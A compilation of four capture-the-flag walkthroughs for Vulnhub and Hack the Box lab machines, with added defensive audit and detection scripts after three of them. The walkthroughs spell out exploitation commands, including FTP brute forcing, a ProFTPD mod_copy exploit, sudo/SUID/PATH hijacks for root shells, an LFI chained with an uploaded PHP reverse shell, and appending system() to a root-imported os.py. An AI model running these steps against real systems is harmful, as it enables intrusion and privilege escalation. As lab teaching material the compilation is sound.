Mission-Pumpkin v1.0: PumpkinFestival Vulnhub Walkthrough


PumpkinFestival is another CTF challenge from the Mission-Pumpkin v1.0 series, created with beginners in mind, and all credit for this VM goes to Jayanth. This level is all about collecting 10 pumpkin tokens and gaining root access to collect the PumpkinFestival_Ticket.
You can download it from HERE
Level: Beginner to Intermediate
Penetrating Methodology:
1. Scanning
· NMAP
2. Enumeration
· FTP
· WPScan
· DirBuster
· Enum4linux
· Hydra
3. Exploitation
· SSH
4. Privilege Escalation
· Exploiting Sudo rights

Walkthrough:

Scanning:
Let’s start off with the scanning process. This target VM took the IP address of 192.168.1.101 automatically from our local wifi network.
Then, as usual, we used our favorite tool Nmap for port scanning. We found that ports 21 and 80 are open and SSH is running on port 6880.
nmap -p- -A 192.168.1.101



Token 1:
Anonymous login is enabled on FTP, so we tried to log in using anonymous:anonymous.
Upon successful login we traversed through different directories and found our first token 2d6dbbae84d724409606eddd9dd71265 inside the token.txt file.
ftp 192.168.1.101
cd secret
get token.txt
bye
cat token.txt




Token 2:
Port 80 is open on the target system. We opened the IP address in our browser and didn’t get any token, but we found a word, Alohomera!, which might be useful later on.




We checked the page source and got our second token 45d9ee7239bc6b0bb21d3f8e1c5faa52.

In the same page source we also found a username, Harry, which we will use at a later stage.






Token 3:
In the earlier Nmap scan we got a few directories, so we tried to access each of them one by one.
From /store/track.txt we found a username, admin, and a domain name, pumpkin.local.




We mapped the domain name to the target machine’s IP address in the /etc/hosts file.




After that we accessed pumpkin.local from the browser; it turned out to be another WordPress site, and we got one more flag: 06c3eb12ef2389e2752335beccfb2080.





Token 4:
There is one more directory from the Nmap scan, named /token.

We couldn’t find anything inside this directory using different directory brute-forcing tools, but we still suspected there must be something inside it. So after a number of hit-and-trial requests we finally got our fourth token 2c0e11d2200e2604587c331f02a7ebea in token.txt.




Token 5:
Since we have a WordPress site running under the pumpkin.local domain name, we ran WPScan and got a file named readme.html.
wpscan --url http://pumpkin.local -e at,ap,u


  

We also got two usernames, admin & morse, for the WordPress site, which we will use to access the admin login of the site later on.




After accessing the URL pumpkin.local/readme.html we got some encoded text.
We tried to decode it online; it was base62 encoded and gave us a password Ug0t!TrIpyJ for the users morse & jack.




As we have got the password for morse, we logged in to wp-admin and got our 5th token 7139e925fd43618653e51f820bc6201b.





Token 6:

Since we have one more wp-admin user named admin, and if you remember we also got a keyword earlier, Alohomera!, we tried it as the password to log in to the WordPress site. We were able to do so and eventually got our 6th token f2e00edc353309b40e1aed18e18ab2c4.




Token 7:
It’s always good practice to use multiple tools for brute-forcing to get more reliable and additional results.
We used DirBuster to brute-force the URL http://pumpkin.local and got one more path, license.txt.





Accessing the same path in the browser gave us one more token 5ff346114d634a015ce413e1bc3d8d71.



Token 8:
We have a total of four users, admin, morse, jack & harry, with passwords for only three of them.
So we tried to get the password of harry by brute-forcing with Hydra. We got the password yrrah.

hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.1.101 ftp -e nsr




We logged into FTP on the target machine using these credentials and found the 8th token ba9fa9abf2be9373b7cbd9a6457f374e.
ftp 192.168.1.101
ls
get token.txt
bye
cat token.txt





Token 9:
In the above screenshot you can see a directory named /Donotopen. We went inside this directory and found another directory named /NO, and after a lot of traversing we finally found the file token.txt. We downloaded the file to our system and got the 9th token 8d66ef0055b43d80c34917ec6c75f706.
cd Donotopen
ls
cd NO
cd NOO
cd NOOO
cd NOOOO
get token.txt
bye
cat token.txt

   


Token 10:
It’s time to get the 10th token. Let’s HUNT!
From the above screen you might have seen there is one more directory, /NOOOOO, and after some traversing we found a file data.txt. We downloaded the file to our Kali machine and found some random codes inside.
cd NOOOOOO
get data.txt
bye





We checked the file type: it is a tar file. We untarred it and got another file, data.
That file also came out to be a zip file, and after unzipping we got a file key; after untarring that, we finally got a file named jack which had a hexdump inside.
file data.txt
tar vxf data.txt
tar xjf data
tar vxf key
cat jack




Then we used xxd to convert the hexdump back into binary and write it to a file.
We got an SSH private key.
xxd -r -p jack > sshkey




As we have got an SSH key, we used it to SSH into the target machine on port 6808 as user jack.
After successful login we found our final, 10th token 8d66ef0055b43d80c34917ec6c75f706.
chmod 600 sshkey
ssh jack@192.168.1.101 -i sshkey -p 6808
file token
./token
sudo -l




Privilege Escalation/PumpkinFestival_Ticket:

From the above screenshot we can see that jack has sudo permission for the alohomora file.
Now, to get the root shell and finally the PumpkinFestival_Ticket, we will exploit jack’s sudo permissions.
We checked for the pumpkins directory but couldn’t find one, so we created a directory named pumpkins and then, using the echo command, created a file named alohomora with /bin/bash copied in it.
We then gave it execute permissions and ran the file through sudo; we got the root shell and eventually the PumpkinFestival_Ticket, which completes our challenge.

mkdir pumpkins
echo "/bin/sh" > /home/jack/pumpkins/alohomora
chmod 777 /home/jack/pumpkins/alohomora
sudo /home/jack/pumpkins/alohomora
id
cd /root
ls
cat PumpkinFestival_Ticket
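The rule was exploitable because the sudo entry pointed at a path that did not exist yet and lived under jack’s own home. The following Python script is an added example (not part of the original walkthrough) of the audit an administrator would run: it parses sudo -l style rule lines and flags command paths that are missing, that sit under the sudoer’s home, or that pass through a group/world-writable directory. The rule text and the directory layout built in demo() are constructed in a temporary directory rather than on a real /home/jack.

```python
import os
import re
import stat
import tempfile

# Matches the command part of a "sudo -l" line such as
#   (root) NOPASSWD: /home/jack/pumpkins/alohomora
RULE_RE = re.compile(r"^\s*\([^)]*\)\s*(?:NOPASSWD:\s*)?(/\S+)")


def parse_sudo_rules(sudo_l_output):
    """Return the absolute command paths listed in sudo -l style output."""
    return [m.group(1) for m in map(RULE_RE.match, sudo_l_output.splitlines()) if m]


def writable_by_others(path):
    """True if the group or world write bit is set on path."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_rule(cmd_path, home, top="/"):
    """Classify one sudo command path and return a list of findings.

    A rule is unsafe when the command does not exist yet (the sudoer can create
    it), when it lives under the sudoer's own home, or when any directory between
    `top` and the command is group/world writable (anyone can swap the file).
    """
    findings = []
    if not os.path.exists(cmd_path):
        findings.append("command missing: the sudoer can create it")
    if cmd_path.startswith(home.rstrip("/") + "/"):
        findings.append("command lives under the sudoer's home directory")
    parent = os.path.dirname(cmd_path)
    while parent.startswith(top) and parent != top:
        if os.path.isdir(parent) and writable_by_others(parent):
            findings.append(f"{parent} is group/world writable")
        parent = os.path.dirname(parent)
    return findings


def demo():
    """Rebuild the walkthrough's layout in a temp dir (constructed) and audit it."""
    base = tempfile.mkdtemp()
    home = os.path.join(base, "home", "jack")
    safe_dir = os.path.join(base, "usr", "bin")
    for d in (os.path.join(home, "pumpkins"), safe_dir):
        os.makedirs(d)
    for d in (os.path.join(base, "home"), home, os.path.join(base, "usr"), safe_dir):
        os.chmod(d, 0o755)                                  # sane system directories
    os.chmod(os.path.join(home, "pumpkins"), 0o777)         # what jack set up
    open(os.path.join(safe_dir, "id"), "w").close()         # stand-in for /usr/bin/id
    rules = f"(root) NOPASSWD: {home}/pumpkins/alohomora\n(root) {safe_dir}/id\n"
    return {cmd: audit_rule(cmd, home, top=base) for cmd in parse_sudo_rules(rules)}


if __name__ == "__main__":
    for cmd, findings in demo().items():
        print(cmd, "->", "; ".join(findings) or "ok")
```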



Digitalworld.local: JOY Vulnhub Walkthrough


Today we have another CTF post, one more in the Digitalworld.local series, named “joy”; the credit goes to Donavan. This is a boot-to-root challenge available on Vulnhub; you can download it from the link given below. The CTF is designed for OSCP practice.

Level: Intermediate
Task: Obtain root shell


Penetration Testing Methodologies
Scanning
· Nmap
Enumeration
· FTP anonymous login
Exploit
· Exploit ProFTPD using Metasploit
Privilege Escalation
· Sudo right

Walkthrough


Scanning
Let’s start off with the scanning process. This target VM took the IP address of 192.168.1.104 automatically from our local wifi network.

Then, as usual, we used our favorite tool Nmap for port scanning. Here we found that many ports were open, but port 21 for FTP looked most interesting to me, as anonymous login was allowed on the running machine for two directories, /upload and /download.


Enumeration
So we connected to FTP, where I found two directories, /download and /upload. The upload directory has read and write permission whereas /download has read permission only. So we tried to access the /download directory and found a file within it named “directory”.

ftp 192.168.1.104
ls
cd /download
ls
get directory

Thus we copied the file named directory to our local machine.



By reading the directory file you will see that it gives a brief idea of Patrick’s directory, where Patrick should be the user account. In it we looked at a file named “version_control”, which could be considered a suspect.


Since version_control exists inside Patrick’s home directory we cannot grab the file directly, so I tried to copy version_control into the /upload directory, because it has read/write permission through the FTP anonymous login.
telnet 192.168.1.104 21
site cpfr /home/patrick/version_control
site cpto /home/ftp/upload/version_control
Hence, with the help of the above commands, we copied “version_control” into the /upload folder.


Further, we navigated to /upload/version_control and found the version of the FTP service running on the host machine; moreover, we obtained the path of the web root, i.e. /var/www/tryingharderisjoy.

Exploit
So we searched for an exploit for ProFTPD and found a Metasploit module, so we executed the following commands to get a session on the host machine.

use exploit/unix/ftp/proftpd_modcopy_exec
msf exploit(unix/ftp/proftpd_modcopy_exec) > set rhosts 192.168.1.104
msf exploit(unix/ftp/proftpd_modcopy_exec) > set SITEPATH /var/www/tryingharderisjoy
msf exploit(unix/ftp/proftpd_modcopy_exec) > exploit
We successfully obtained a command shell on the remote machine; now it was time for post-enumeration to step towards privilege escalation. So we used the Python one-liner to get a proper TTY shell and started traversing directories.
It feels good when we dig out Patrick’s credentials from inside /ossec/patricsecretofjoy:
credentials for JOY:
patrick:apollo098765
root:howtheheckdoiknowwhattherootpasswordis


Privilege Escalation

Without wasting time we switched to Patrick and checked whether any sudo rights are assigned to him. Here we found that Patrick can run /home/patrick/script/test as the sudo user. When we ran the test script it gave nothing useful, as it was a demo to test a working bash script; so the file “test” was useless, but it is owned by root, which looked doubtful to us.
So we decided to replace the /test script with another malicious script, but there was no write permission on the /script directory.


Thus we again decided to use the FTP anonymous login to replace the genuine /test file with a bogus /test file, which will be a backdoor that provides a higher-privilege shell.
Therefore we created a malicious file to get a bash shell with the help of the command given below, named it “test” and uploaded it into the /upload directory, since that is the writable folder.
echo "awk 'BEGIN {system(\"/bin/bash\")}'" > test


Once again, with the help of telnet, let’s connect to the FTP service running on the host machine and execute the following commands to inject the malicious script “test” into /home/patrick/script.
telnet 192.168.1.104 21
site cpfr /home/ftp/upload/test
site cpto /home/patrick/script/test


So now we have injected the malicious file inside /script, and user Patrick has the sudo right to execute /script/test as the superuser. Now let’s escalate privileges by executing the following command and finish the task assigned by the author.
sudo /home/patrick/script/test
Hmmmmm!! So we have spawned a root shell successfully; now let’s move inside the /root directory and grab the proof.txt file and the secret file.
cd /root
cat proof.txt
cat author-secret.txt
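The two telnet sessions above are exactly what a log-based detection for mod_copy abuse needs to catch: a SITE CPFR whose source, or a SITE CPTO whose destination, lies outside the FTP tree. Below is an added example (not from the original walkthrough) of a small Python detector that pairs CPFR/CPTO commands per client and alerts on such copies. The log line format and the sample lines are constructed, and the FTP root /home/ftp is inferred from the /home/ftp/upload path used above.

```python
import re

# The FTP tree anonymous users are confined to; /home/ftp/upload sits under it.
FTP_ROOT = "/home/ftp"

# Constructed log shape:  client - user [timestamp] "command" status
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] "(?P<cmd>[^"]*)" (?P<status>\d+)')
COPY_RE = re.compile(r"^SITE\s+(CPFR|CPTO)\s+(\S+)", re.IGNORECASE)


def inside(path, root):
    """True if path is root itself or lies somewhere below it."""
    root = root.rstrip("/")
    return path == root or path.startswith(root + "/")


def detect_mod_copy_abuse(log_text, ftp_root=FTP_ROOT):
    """Return alert strings for SITE CPFR/CPTO use that reaches outside ftp_root.

    A copy within the FTP tree is ordinary mod_copy use; a source outside it
    reads a file the client could not RETR, and a destination outside it writes
    a file the client could not STOR. CPFR/CPTO are paired per (client, user).
    """
    pending = {}          # (ip, user) -> source path from the last CPFR
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        c = COPY_RE.match(m["cmd"])
        if not c:
            continue
        verb, path = c.group(1).upper(), c.group(2)
        who = (m["ip"], m["user"])
        if verb == "CPFR":
            pending[who] = path
            if not inside(path, ftp_root):
                alerts.append(f"{who[0]} {who[1]}: CPFR reads outside FTP root: {path}")
        else:
            src = pending.pop(who, "<no CPFR>")
            if not inside(path, ftp_root):
                alerts.append(f"{who[0]} {who[1]}: CPTO writes outside FTP root: {src} -> {path}")
    return alerts


# Constructed sample: the two copies from the walkthrough plus benign traffic.
SAMPLE_LOG = """\
192.168.1.10 - anonymous [12/May/2019:10:01:02 +0000] "USER anonymous" 331
192.168.1.10 - anonymous [12/May/2019:10:01:05 +0000] "SITE CPFR /home/patrick/version_control" 350
192.168.1.10 - anonymous [12/May/2019:10:01:06 +0000] "SITE CPTO /home/ftp/upload/version_control" 250
192.168.1.10 - anonymous [12/May/2019:10:20:40 +0000] "SITE CPFR /home/ftp/upload/test" 350
192.168.1.10 - anonymous [12/May/2019:10:20:41 +0000] "SITE CPTO /home/patrick/script/test" 250
192.168.1.20 - patrick [12/May/2019:11:00:00 +0000] "SITE CPFR /home/ftp/upload/a.txt" 350
192.168.1.20 - patrick [12/May/2019:11:00:01 +0000] "SITE CPTO /home/ftp/download/a.txt" 250
"""

if __name__ == "__main__":
    for alert in detect_mod_copy_abuse(SAMPLE_LOG):
        print(alert)
```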

Beast 2: Vulnhub Walkthrough


Today we are going to take another CTF challenge Beast:2. The credit for making this VM machine goes to “Avraham Cohen” and it is a boot2root challenge where we have to root the server and capture the flag to complete the challenge. You can download this VM here.
Security Level: Beginner
Penetrating Methodology:
1. Scanning
· NMAP
2. Enumeration
· Wireshark
3. Exploitation
· SSH
4. Privilege Escalation
· Exploiting SUID rights

Walkthrough:

Scanning:
Let’s start off with the scanning process. This target VM took the IP address of 192.168.1.102 automatically from our local wifi network.
Then, as usual, we used our favorite tool Nmap for port scanning. We found that SSH is open and running on two ports, 22 and 65022.
nmap -p- -A 192.168.1.102


We tried to SSH to the target on port 65022 and found it working, but we don’t have the username and password yet.

So our next step is to hunt for the SSH username and password.


Enumeration:
All we have is the SSH service enabled on the target machine and nothing else. So we started capturing the target machine’s traffic using Wireshark.
We tried different filters and found something useful with the udp filter.
ip.addr==192.168.1.102 && udp





We followed the UDP stream and two words got our attention, whiteshark & whitepointer, which could be the usernames for SSH.



In another captured data packet we found the password Ch@ndr!chthye$.





Exploitation:

So far we probably have two usernames and one password.
We tried to SSH to the target with both usernames one by one; the whitepointer & Ch@ndr!chthye$ combination worked for us and we were able to log in to the target system.
After logging in we checked for sudo rights, but the user was not a sudoer.
We also checked for files with the SUID bit set and found that /usr/bin/root has SUID set.
find / -perm -u=s -type f 2>/dev/null



Privilege Escalation:
To elevate to a root shell we will exploit the SUID permissions of the /usr/bin/root file. Using the strings command we found that the root file is actually running the whoami command.


We used the PATH variable methodology to exploit the privileges of the root file. We created a new file named whoami inside the /tmp directory, put /bin/bash inside it using the echo command, then gave it full permissions. We then exported the path.
To know more about the PATH variable, check our article on the same HERE.
After that, once we executed the /usr/bin/root file, we got the root shell and then also flag.txt as anticipated.
cd /tmp
echo "/bin/bash" > whoami
chmod 777 whoami
export PATH=/tmp:$PATH
/usr/bin/root
cd /root
cat flag.txt
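The trick above works only because the SUID program asks for a bare name (whoami) and trusts the PATH it inherited from the caller. The following Python script is an added example (not from the original walkthrough) that rebuilds that situation in a temporary directory: a planted whoami in a stand-in for /tmp beside a stand-in for the real one, a lookup of the same bare name under the inherited PATH and under a fixed one, and the ownership/permission check a privileged program should make before running anything it resolves. The directory names and the SECURE_PATH value are assumptions.

```python
import os
import shutil
import stat
import tempfile

# PATH a privileged program should set for itself instead of trusting the caller's.
SECURE_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"


def resolve_command(cmd, search_path):
    """Resolve a bare command name the way system()/execvp do, but along an
    explicit search path rather than the environment inherited from the caller."""
    return shutil.which(cmd, path=search_path)


def trusted_executable(path, trusted_uid=0):
    """A privileged program should only run binaries that are root-owned and not
    writable by group or world; the planted /tmp/whoami (chmod 777) fails this."""
    st = os.stat(path)
    return st.st_uid == trusted_uid and not (st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def demo():
    """Rebuild the walkthrough's situation in a temp dir (constructed layout).

    One directory stands in for /tmp with a planted 'whoami' (chmod 777, as in
    the walkthrough), another for /usr/bin with the real one. Returns where a
    lookup of the bare name 'whoami' lands under the attacker-controlled PATH
    (/tmp first) and under a fixed system-only search path.
    """
    base = tempfile.mkdtemp()
    planted_dir = os.path.join(base, "tmp")
    system_dir = os.path.join(base, "usr", "bin")
    for d, mode in ((planted_dir, 0o777), (system_dir, 0o755)):
        os.makedirs(d)
        p = os.path.join(d, "whoami")
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\necho whoami from %s\n" % d)
        os.chmod(p, mode)
    inherited = planted_dir + os.pathsep + system_dir   # export PATH=/tmp:$PATH
    return {
        "inherited": resolve_command("whoami", inherited),
        "fixed": resolve_command("whoami", system_dir),
        "planted": os.path.join(planted_dir, "whoami"),
        "real": os.path.join(system_dir, "whoami"),
    }


if __name__ == "__main__":
    r = demo()
    print("inherited PATH resolves to:", r["inherited"])
    print("fixed PATH resolves to:    ", r["fixed"])
    print("planted copy trusted?", trusted_executable(r["planted"]))
```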


Hack the Box: Friendzone Walkthrough


FriendZone is a recently retired CTF VM on Hack the Box with the objective – Capture the user and root flag. Hack the Box offers a wide range of VMs for practice from beginner to advanced level and it is great for penetration testers and researchers.
Level: Intermediate
Task: To find user.txt and root.txt file
Note: Since these labs are available online, they have a static IP. The IP of FriendZone is 10.10.10.123.

Penetration Testing Methodologies
Scanning
· Nmap
Enumeration
· SMB shared directory
· DNS zone transfer
· MySQL creds
Exploit
· LFI to RCE
· Capture the user flag
Privilege Escalation
· Abusing Python library
· Capture the root flag

Walkthrough
Let’s start off by scanning with Nmap to check for open ports.
nmap -sC -sV 10.10.10.123
From the Nmap scan we found that many ports are open, such as 22, 53, 80, 443 and 445, with several services available, and we noted that the SSL certificate is registered to friendzone.red.

Enumeration
On exploring the vulnerable machine’s IP in the web browser, it welcomes us with the web page shown below.
Here also I notice friendzone.red, and this could be a clue for proceeding further. As per the Nmap result, port 53 is open for TCP, which means a DNS zone transfer may be possible.

I didn’t find any other useful information on the home page, so I tried to enumerate web directories with the help of DIRB. But this was not worthwhile either, because the enumerated result was not valuable when inspected further.

Consequently I switched to another enumeration approach, a null-session SMB enumeration. So, with the help of SMBMap, a Linux utility, we tried to enumerate the SMB shared directories.
smbmap -H 10.10.10.123
I found two shared directories; among those, /general had read-only permission and /Development has both read and write permission. So when we accessed the /general share we obtained a text file named “creds”.
smbclient //10.10.10.123/general
ls
get creds.txt
In this file I found the following credentials, which could be used later.
admin:WORKWORKHhallelujah@#

First I added friendzone.red to the /etc/hosts file but didn’t find any valuable information, so I enumerated sub-domains by executing the following command (a DNS zone transfer) and fetched some sub-domains which could be useful.
host -l friendzone.red 10.10.10.123
Further, I saved administrator1.friendzone.red in the /etc/hosts file for accessing this domain.

On exploring administrator1.friendzone.red we got a login portal where I submitted the credentials found above.

So we found another hint, “/dashboard.php”, which was a web directory.

On enumerating /dashboard.php we found the following web page; here it gave the message “image_name param is missing”.

Therefore we injected “default is image_id=a.jpg&pagename=timestamp” into the URL and obtained the following web page, where we noticed the timestamp; this looked a little suspicious towards LFI.
https://administrator1.friendzone.red/dashboard.php?image_id=b.jpg&pagename=timestamp

Exploiting LFI
To confirm, I tried calling timestamp.php; by obtaining the timestamp on the screen it was confirmed that the page is vulnerable to LFI. Now let’s extend LFI to RCE to obtain a shell on the host machine.
As we knew that /Development is the only share with both read and write permission, we can place our malicious file inside this directory and execute the backdoor through the LFI to obtain a reverse connection.
Then I used pentestmonkey’s PHP reverse shell, with small modifications to $lhost & $lport, as the backdoor to be planted on the host machine.
So we connected to SMB with the help of smbclient and uploaded php-reverse-shell inside /Development. Simultaneously we launched a netcat listener in a new terminal to obtain the reverse connection from the host machine.
smbclient //10.10.10.123/Development
Then execute the uploaded PHP backdoor through the LFI as shown below:
https://administrator1.friendzone.red/dashboard.php?image_id=b.jpg&pagename=/etc/Development/php-reverse-shell
As soon as we executed the above URL in the browser we had a netcat session; to obtain a proper shell we used the Python pty one-liner, and we found our 1st flag inside /home/friend.
With a little more traversing I found credentials for user “friend” inside /var/www/mysql_data.conf:
user=friend
pass=Agpyu12!0.213$
Privilege Escalation
So, with the help of the above enumerated creds we tried SSH and, luckily, we connected. We then tried to identify weak file permissions or roles for escalating privileges to a root shell or the root flag.
As I failed to identify any sudo rights or SUID files, I went for pspy64s to examine the running processes of the machine. So I downloaded the script inside the /tmp directory and gave it full permissions.
On running pspy64s we noticed that a Python script was being executed by root, which was surprising to us.
So I decided to take a look at what the script was doing, using the cat command to read it.
cat /opt/server_admin/reporter.py
Hmmm! I didn’t find any useful operation being executed by this script other than importing the Python library “os.py”, so I took advantage of that for privilege escalation.

Taking advantage of the Python library import, we can turn os.py into a bogus library (by appending to it) that reads the root flag for us.
cd /tmp
echo "system('cat /root/root.txt > /tmp/flag')" >> /usr/lib/python2.7/os.py
After some time it will write the root flag to /tmp/flag as shown in the image below. Thus we obtained the root flag and finished this challenge.
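This worked because a script run by root imported a library file that a low-privileged user could modify. The following Python script is an added example (not from the original walkthrough) of the check an administrator would run on /usr/lib/python2.7 and on the search path of a root-run script like reporter.py: it reports directories on the module search path that are group/world writable (anyone could drop a shadowing os.py) and module files that are themselves writable (anyone could append to os.py, as above). The layout built in demo() is constructed in a temporary directory.

```python
import os
import stat
import sys
import tempfile


def writable_by_others(path):
    """True if group or world can write to path (the bit the attacker needed)."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_import_path(search_path, modules=("os",)):
    """Report weak permissions that let a non-root user hijack an import.

    Checks each directory on the module search path (a writable directory lets
    anyone place a new os.py that shadows the real one) and the named module
    files inside it (a writable os.py lets anyone append code to it).
    Returns a list of finding strings.
    """
    findings = []
    for d in search_path:
        if not os.path.isdir(d):
            continue
        if writable_by_others(d):
            findings.append(f"directory writable by others: {d}")
        for name in modules:
            f = os.path.join(d, name + ".py")
            if os.path.isfile(f) and writable_by_others(f):
                findings.append(f"module writable by others: {f}")
    return findings


def audit_running_interpreter():
    """Audit this interpreter's own sys.path for the same weakness."""
    return audit_import_path(sys.path, modules=("os",))


def demo():
    """Constructed layout: a library dir with a writable os.py beside a sane one."""
    base = tempfile.mkdtemp()
    weak = os.path.join(base, "python2.7")
    good = os.path.join(base, "python3")
    for d in (weak, good):
        os.makedirs(d)
        os.chmod(d, 0o755)
        with open(os.path.join(d, "os.py"), "w") as fh:
            fh.write("# stand-in for the stdlib os module\n")
        os.chmod(os.path.join(d, "os.py"), 0o644)
    os.chmod(os.path.join(weak, "os.py"), 0o666)   # the misconfiguration on FriendZone
    return weak, good, audit_import_path([weak, good])


if __name__ == "__main__":
    weak_dir, good_dir, findings = demo()
    print("\n".join(findings) or "no findings")
    print("this interpreter:", audit_running_interpreter() or "clean")
```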